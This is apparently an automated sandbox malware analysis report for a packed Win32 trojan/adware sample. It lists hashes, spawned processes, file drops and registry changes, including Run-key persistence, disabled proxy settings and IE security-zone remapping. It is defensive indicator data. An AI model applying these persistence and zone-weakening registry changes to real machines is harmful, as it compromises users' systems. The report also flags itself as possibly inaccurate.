Trojan.Win32.Generic!BT (VIPRE), Artemis!49ECEA57D92B (McAfee), MicroNames Ltd.481 (AVG), Win32:Adware-ADK [PUP] (Avast), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, PUP, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 49ecea57d92bc3f004d63a13998ed827
SHA1: c02e6913d58fc61b5e381e597af8baa43f151b16
SHA256: 5cdc46a6eee9fbb7e05daccafa50829771d35357667e30d7f5d530795148080f
SSDeep: 24576:5cgCYQ1LGum4sx8Kofd/uV wPZA7fGJUJd:egCh1LGumhuW MZAzGi3
Size: 837272 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-11-06 21:53:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2700
WinCtrCon.exe:2684
WinCtrCon.exe:2880
WinCtrProc.exe:2352
WinCtrProc.exe:1992
WinCtrProc.exe:2504
WinCtrProc.exe:1764
irsetup.exe:2560
The Trojan injects its code into the following process(es):No processes have been created.
File activity
The process %original file name%.exe:2700 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
The process WinCtrCon.exe:2684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\sTakeList[1].htm (917 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF4DA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WinCtrProc[1].exe (0 bytes)
The process WinCtrCon.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WinCtrProc[1].exe (409017 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF3B7E.tmp (0 bytes)
The process WinCtrProc.exe:2352 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF2076.tmp (0 bytes)
The process WinCtrProc.exe:1992 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA42A.tmp (0 bytes)
The process WinCtrProc.exe:2504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\background_gradient[1] (453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\down[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[2] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\keyword_platinum[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\Uninstall_Ctr[1].exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\ErrorPageTemplate[1] (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\StakePsList[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\httpErrorPagesScripts[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\down[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dnserrordiagoff_webOC[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\bullet[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ErrorPageTemplate[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\errorPageStrings[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\background_gradient[1] (0 bytes)
The process WinCtrProc.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\down[1] (3 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrCon[1].exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ErrorPageTemplate[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\background_gradient[1] (453 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF252.tmp (0 bytes)
The process irsetup.exe:2560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\VB6KO.DLL (2712 bytes)
%System%\MSINET.OCX (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrCon.exe (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
Registry activity
The process %original file name%.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process WinCtrCon.exe:2684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 44 CB 87 32 31 D1 EA 1E FE 3F 07 20 89 FA 11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"MomDate" = "5/24/2014"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -oJzqEOx"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -oJzqEOx"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
"ProxyOverride"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProProc"
The process WinCtrCon.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\InetCtls.Inet.1]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCR\InetCtls.Inet\CurVer]
"(Default)" = "InetCtls.Inet.1"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}]
"(Default)" = "DInetEvents"
[HKCU\Software\WinCtrView]
"Upmom" = "N"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\InetCtls.Inet.1\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS]
"(Default)" = "2"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
"(Default)" = "132497"
[HKCR\InetCtls.Inet\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"
[HKCU\Software\WinCtrView]
"firstTime" = "0"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCR\InetCtls.Inet]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCU\Software\WinCtrView]
"Commit" = "N"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}]
"(Default)" = "IInet"
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
"(Default)" = "InetCtls.Inet.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32]
"(Default)" = "%System%\MSINET.OCX"
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control General Property Page Object"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"
[HKCU\Software\WinCtrView]
"Version" = "1423"
[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR]
"(Default)" = ""
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
"(Default)" = "0"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
"(Default)" = "InetCtls.Inet"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 31 E1 96 2D 96 64 AF 62 86 BF CD AE A1 7D F8"
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"MomDate" = "5/24/2014"
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control URL Property Page Object"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
"(Default)" = "%System%\MSINET.OCX, 1"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"
[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe -DYOFTdMM"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProProc"
The process WinCtrProc.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 2B CB 83 13 12 A0 9A 71 E4 36 D3 FA 9A D2 ED"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process WinCtrProc.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 A8 29 71 67 C8 1D E6 4D E0 05 F9 7A 8B 4E 07"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process WinCtrProc.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 38 14 B2 82 9A 4C 6F C7 C7 35 B2 0B AB F0 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\WinCtrView]
"ver" = "sup"
"Actdate" = "5/24/2014"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\WinCtrView]
"Commit" = "Y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"USER_NO" = "3207"
"firstTime" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
The process WinCtrProc.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 27 82 26 2B A7 36 84 1A FC BE BE 81 BC 26 D6"
[HKCU\Software\WinCtrView]
"Upmom" = "Y"
